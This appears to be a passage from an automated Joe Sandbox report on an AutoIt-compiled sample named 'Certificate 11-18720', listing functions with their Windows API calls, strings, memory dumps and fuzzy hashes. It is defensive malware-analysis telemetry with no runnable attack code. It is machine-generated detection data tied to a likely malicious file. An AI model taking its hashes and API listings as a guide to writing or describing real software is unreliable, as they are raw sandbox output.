                                                                                    • SendMessageW.USER32(?,0000133D,?,?), ref: 0062BB0A
                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0062BB2C
                                                                                    • GetMenuItemInfoW.USER32(?), ref: 0062BB76
                                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0062BBA3
                                                                                    • DrawMenuBar.USER32(?), ref: 0062BBB2
                                                                                    • SetWindowTextW.USER32(?,0000014E), ref: 0062BBDA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                    • String ID: 0
                                                                                    • API String ID: 1073566785-4108050209
                                                                                    • Opcode ID: cd459c96826dee10a3262f4714525580d6e29463762f3b70642eba662ca5a6cf
                                                                                    • Instruction ID: 984064abb6250ef6242c4c4e0de25890bfaeed2e9e12f732b5d5e854bd50ecfc
                                                                                    • Opcode Fuzzy Hash: cd459c96826dee10a3262f4714525580d6e29463762f3b70642eba662ca5a6cf
                                                                                    • Instruction Fuzzy Hash: 38E1E474900629AFDF20DF65DC84EEE7B7AFF05710F149156F919AA290DB708A82CF60
                                                                                    Function 005C2EC0 Relevance: 37.1, APIs: 8, Strings: 13, Instructions: 346COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Foreground
                                                                                    • String ID: ACTIVE$ALL$CLASS$H+g$HANDLE$INSTANCE$L+g$LAST$P+g$REGEXPCLASS$REGEXPTITLE$T+g$TITLE
                                                                                    • API String ID: 62970417-2671356491
                                                                                    • Opcode ID: c2810a10781a19a81b97d122304c13fef3db08622fb98d0a6fcbd58360ca9b00
                                                                                    • Instruction ID: 0657722e4ac00db470d55e408ee9122b8ac4d2817f161aefc4e61b8560d43d0b
                                                                                    • Opcode Fuzzy Hash: c2810a10781a19a81b97d122304c13fef3db08622fb98d0a6fcbd58360ca9b00
                                                                                    • Instruction Fuzzy Hash: F9D1C430508247DFCB14EF60C895AAABFB6BF94344F00491DF45A576A1DB30EA9ACBD1
                                                                                    Function 0062764F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCursorPos.USER32(?), ref: 0062778A
                                                                                    • GetDesktopWindow.USER32 ref: 0062779F
                                                                                    • GetWindowRect.USER32(00000000), ref: 006277A6
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00627808
                                                                                    • DestroyWindow.USER32(?), ref: 00627834
                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0062785D
                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0062787B
                                                                                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 006278A1
                                                                                    • SendMessageW.USER32(?,00000421,?,?), ref: 006278B6
                                                                                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 006278C9
                                                                                    • IsWindowVisible.USER32(?), ref: 006278E9
                                                                                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00627904
                                                                                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00627918
                                                                                    • GetWindowRect.USER32(?,?), ref: 00627930
                                                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 00627956
                                                                                    • GetMonitorInfoW.USER32 ref: 00627970
                                                                                    • CopyRect.USER32(?,?), ref: 00627987
                                                                                    • SendMessageW.USER32(?,00000412,00000000), ref: 006279F2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                    • String ID: ($0$tooltips_class32
                                                                                    • API String ID: 698492251-4156429822
                                                                                    • Opcode ID: 847134aeed5c9e267b39fc20389f0caa901a9033d8a8e00ec49737604135fdb4
                                                                                    • Instruction ID: 255b03a5cf47b03e3a8b1e5e94a80993577c04ef8623c3a215ed04c7445e1cd7
                                                                                    • Opcode Fuzzy Hash: 847134aeed5c9e267b39fc20389f0caa901a9033d8a8e00ec49737604135fdb4
                                                                                    • Instruction Fuzzy Hash: F6B18B71A08711AFDB04DF64D848F6ABBE6BF89310F00891DF5999B291DB70E805CF96
                                                                                    Function 005DA856 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 005DA939
                                                                                    • GetSystemMetrics.USER32(00000007), ref: 005DA941
                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 005DA96C
                                                                                    • GetSystemMetrics.USER32(00000008), ref: 005DA974
                                                                                    • GetSystemMetrics.USER32(00000004), ref: 005DA999
                                                                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 005DA9B6
                                                                                    • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 005DA9C6
                                                                                    • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 005DA9F9
                                                                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 005DAA0D
                                                                                    • GetClientRect.USER32(00000000,000000FF), ref: 005DAA2B
                                                                                    • GetStockObject.GDI32(00000011), ref: 005DAA47
                                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 005DAA52
                                                                                      • Part of subcall function 005DB63C: GetCursorPos.USER32(000000FF), ref: 005DB64F
                                                                                      • Part of subcall function 005DB63C: ScreenToClient.USER32(00000000,000000FF), ref: 005DB66C
                                                                                      • Part of subcall function 005DB63C: GetAsyncKeyState.USER32(00000001), ref: 005DB691
                                                                                      • Part of subcall function 005DB63C: GetAsyncKeyState.USER32(00000002), ref: 005DB69F
                                                                                    • SetTimer.USER32(00000000,00000000,00000028,005DAB87), ref: 005DAA79
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                    • String ID: AutoIt v3 GUI
                                                                                    • API String ID: 1458621304-248962490
                                                                                    • Opcode ID: c17d15ebf8d883c857d4e47c843c6cad07b9b0bd6febd9606c9a3d4c151cd712
                                                                                    • Instruction ID: 19ecb14733d6cc7e5978d91c5aa80c8b4f8051a9e228e82e838bd115678e41f3
                                                                                    • Opcode Fuzzy Hash: c17d15ebf8d883c857d4e47c843c6cad07b9b0bd6febd9606c9a3d4c151cd712
                                                                                    • Instruction Fuzzy Hash: E3B18075A0020AAFDB24DFA8DC45BEE7BB6FB09314F11421AFA15AB390DB74D841CB51
                                                                                    Function 00623639 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00623735
                                                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,0065DC00,00000000,?,00000000,?,?), ref: 006237A3
                                                                                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 006237EB
                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00623874
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00623B94
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00623BA1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Close$ConnectCreateRegistryValue
                                                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                    • API String ID: 536824911-966354055
                                                                                    • Opcode ID: f28ad2626e968f0cf9ae131d508269b35d8ed10d1fe00579feaca1f36f557aec
                                                                                    • Instruction ID: 8cae65148fa12492e69258f2cd5ba36a1d0f54aca6fc8e7ece344be9cf48016a
                                                                                    • Opcode Fuzzy Hash: f28ad2626e968f0cf9ae131d508269b35d8ed10d1fe00579feaca1f36f557aec
                                                                                    • Instruction Fuzzy Hash: B0027B756006629FCB14EF54D849E1ABBE6FF89710F04885DF98A9B3A1CB34ED41CB81
                                                                                    Function 00626BC9 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00626C56
                                                                                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00626D16
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: BuffCharMessageSendUpper
                                                                                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                    • API String ID: 3974292440-719923060
                                                                                    • Opcode ID: 0d1f7d792480b829c5cfbc1c99b4f4ef755fb2147854da87b51cc15e4bfebe62
                                                                                    • Instruction ID: fbb5a9fb4fd13488b9bccdfede2638690c98620d0931ba1374e16127ce88c3a0
                                                                                    • Opcode Fuzzy Hash: 0d1f7d792480b829c5cfbc1c99b4f4ef755fb2147854da87b51cc15e4bfebe62
                                                                                    • Instruction Fuzzy Hash: 02A1B0302146569FCB14EF14D845E6ABBA6BF84310F10496EB9969B3E2DF30EC06CF41
                                                                                    Function 005FCF50 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 005FCF91
                                                                                    • __swprintf.LIBCMT ref: 005FD032
                                                                                    • _wcscmp.LIBCMT ref: 005FD045
                                                                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 005FD09A
                                                                                    • _wcscmp.LIBCMT ref: 005FD0D6
                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 005FD10D
                                                                                    • GetDlgCtrlID.USER32(?), ref: 005FD15F
                                                                                    • GetWindowRect.USER32(?,?), ref: 005FD195
                                                                                    • GetParent.USER32(?), ref: 005FD1B3
                                                                                    • ScreenToClient.USER32(00000000), ref: 005FD1BA
                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 005FD234
                                                                                    • _wcscmp.LIBCMT ref: 005FD248
                                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 005FD26E
                                                                                    • _wcscmp.LIBCMT ref: 005FD282
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                                                    • String ID: %s%u
                                                                                    • API String ID: 3119225716-679674701
                                                                                    • Opcode ID: 2a99d37d4e7e05542afe346699833358ac761ddd99277c63053ebc4d23e64bb1
                                                                                    • Instruction ID: 6e2a199cae64a74f03d6e6909d58a09ca6ab5abf36363571867106d3599566b0
                                                                                    • Opcode Fuzzy Hash: 2a99d37d4e7e05542afe346699833358ac761ddd99277c63053ebc4d23e64bb1
                                                                                    • Instruction Fuzzy Hash: F7A1D37560470AAFC715DF64C884FBABBAAFF44354F004619FA9992180DB34EA45CBE1
                                                                                    Function 005FD8A7 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetClassNameW.USER32(00000008,?,00000400), ref: 005FD8EB
                                                                                    • _wcscmp.LIBCMT ref: 005FD8FC
                                                                                    • GetWindowTextW.USER32(00000001,?,00000400), ref: 005FD924
                                                                                    • CharUpperBuffW.USER32(?,00000000), ref: 005FD941
                                                                                    • _wcscmp.LIBCMT ref: 005FD95F
                                                                                    • _wcsstr.LIBCMT ref: 005FD970
                                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 005FD9A8
                                                                                    • _wcscmp.LIBCMT ref: 005FD9B8
                                                                                    • GetWindowTextW.USER32(00000002,?,00000400), ref: 005FD9DF
                                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 005FDA28
                                                                                    • _wcscmp.LIBCMT ref: 005FDA38
                                                                                    • GetClassNameW.USER32(00000010,?,00000400), ref: 005FDA60
                                                                                    • GetWindowRect.USER32(00000004,?), ref: 005FDAC9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                    • String ID: @$ThumbnailClass
                                                                                    • API String ID: 1788623398-1539354611
                                                                                    • Opcode ID: 41200da60b3d0c50c21a702412c82ff7800c6b1370516e8683fd48ad5179c7f2
                                                                                    • Instruction ID: 6ab9102168ea52a094c66912fc5dad8c73d4c491f51cbfe2d0c5dbdbc7e3fbff
                                                                                    • Opcode Fuzzy Hash: 41200da60b3d0c50c21a702412c82ff7800c6b1370516e8683fd48ad5179c7f2
                                                                                    • Instruction Fuzzy Hash: 3881B03100834A9BDB05DF50C985F7A7FAAFF84314F04846AFE899A096DB78DD45CBA1
                                                                                    Function 005FD6F4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: __wcsnicmp
                                                                                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                    • API String ID: 1038674560-1810252412
                                                                                    • Opcode ID: 2a2dd994e08060362046ad165769bc7c6faa2b210140e7d0f99b1e9b02332df0
                                                                                    • Instruction ID: de11312a00ed9840980d1b679880b17f7182360902a2eea773f199df70970df8
                                                                                    • Opcode Fuzzy Hash: 2a2dd994e08060362046ad165769bc7c6faa2b210140e7d0f99b1e9b02332df0
                                                                                    • Instruction Fuzzy Hash: 35319E3194420BEADB15FA90CD6BFAEBBB6BF60744F200029F585750D1EB65AE44C621
                                                                                    Function 005FEA9D Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadIconW.USER32(00000063), ref: 005FEAB0
                                                                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 005FEAC2
                                                                                    • SetWindowTextW.USER32(?,?), ref: 005FEAD9
                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 005FEAEE
                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 005FEAF4
                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 005FEB04
                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 005FEB0A
                                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 005FEB2B
                                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 005FEB45
                                                                                    • GetWindowRect.USER32(?,?), ref: 005FEB4E
                                                                                    • SetWindowTextW.USER32(?,?), ref: 005FEBB9
                                                                                    • GetDesktopWindow.USER32 ref: 005FEBBF
                                                                                    • GetWindowRect.USER32(00000000), ref: 005FEBC6
                                                                                    • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 005FEC12
                                                                                    • GetClientRect.USER32(?,?), ref: 005FEC1F
                                                                                    • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 005FEC44
                                                                                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 005FEC6F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                    • String ID:
                                                                                    • API String ID: 3869813825-0
                                                                                    • Opcode ID: ba59c949c67a4be0a8994edef05fb436678e1a1906474be20f1cbb287db98789
                                                                                    • Instruction ID: 50163592998ae61048f87785d7d0aebdf2a2fc6f8525a5a924640a3e0e88d715
                                                                                    • Opcode Fuzzy Hash: ba59c949c67a4be0a8994edef05fb436678e1a1906474be20f1cbb287db98789
                                                                                    • Instruction Fuzzy Hash: B2513B75900709EFDB21DFA8CD8AF6EBBF6FF04705F004928E696A25A0D774A945CB10
                                                                                    Function 006179B0 Relevance: 25.6, APIs: 17, Instructions: 109COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 006179C6
                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 006179D1
                                                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 006179DC
                                                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 006179E7
                                                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 006179F2
                                                                                    • LoadCursorW.USER32(00000000,00007F81), ref: 006179FD
                                                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 00617A08
                                                                                    • LoadCursorW.USER32(00000000,00007F80), ref: 00617A13
                                                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 00617A1E
                                                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 00617A29
                                                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 00617A34
                                                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 00617A3F
                                                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 00617A4A
                                                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 00617A55
                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00617A60
                                                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 00617A6B
                                                                                    • GetCursorInfo.USER32(?), ref: 00617A7B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Cursor$Load$Info
                                                                                    • String ID:
                                                                                    • API String ID: 2577412497-0
                                                                                    • Opcode ID: 109bae810effd53ccf3ffd0e712bbbb844a000e6c7c8706fce3c027288911156
                                                                                    • Instruction ID: 4dfdbef0bc55962d4f14c3ff3c7b36bb6613b4013d7ad969254a2f65d05b47fb
                                                                                    • Opcode Fuzzy Hash: 109bae810effd53ccf3ffd0e712bbbb844a000e6c7c8706fce3c027288911156
                                                                                    • Instruction Fuzzy Hash: 033127B0D4831A6ADB109FB68C8999FBFF9FF04750F54452BE50DE7280DA78A5408FA1
                                                                                    Function 005CC833 Relevance: 25.0, APIs: 7, Strings: 7, Instructions: 479COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 005DE968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,005CC8B7,?,00002000,?,?,00000000,?,005C419E,?,?,?,0065DC00), ref: 005DE984
                                                                                      • Part of subcall function 005C660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,005C53B1,?,?,005C61FF,?,00000000,00000001,00000000), ref: 005C662F
                                                                                    • __wsplitpath.LIBCMT ref: 005CC93E
                                                                                      • Part of subcall function 005E1DFC: __wsplitpath_helper.LIBCMT ref: 005E1E3C
                                                                                    • _wcscpy.LIBCMT ref: 005CC953
                                                                                    • _wcscat.LIBCMT ref: 005CC968
                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 005CC978
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 005CCABE
                                                                                      • Part of subcall function 005CB337: _wcscpy.LIBCMT ref: 005CB36F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
